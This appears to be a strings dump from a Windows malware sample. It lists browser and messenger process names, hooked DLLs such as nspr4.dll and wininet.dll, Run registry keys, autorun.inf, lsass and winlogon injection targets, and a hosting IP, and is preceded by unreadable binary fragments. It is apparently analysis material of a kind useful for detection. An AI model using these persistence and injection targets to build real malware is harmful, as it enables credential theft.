7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
6X7b7f7p7t7~7
8 8$8(8,808H9T9`9l9x9
: :,:8:D:P::h:t:
;(;4;@;L;X;d;p;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<<`<d<h<l<p<t<x<|<
H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X99`9d9h9l9p9t9x9|9
: :`:l:x:
; ;(;,;0;8;<;@;H;L;P;X;;`;h;l;p;x;|;
< <$<(<0<4<8<<<@<H<L<P<T<X<`<d<h<l<p<x<|<
= =$=(=,=0=8=<=@=D=H=P=T=X==`=h=l=p=t=x=
> >(>,>4>8>@>D>L>P>X>>h>p>x>

Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Explorer1explore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
1explore.exe
f1refox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

hosting infos:
http://whois.domaintools.com/95.211.165.62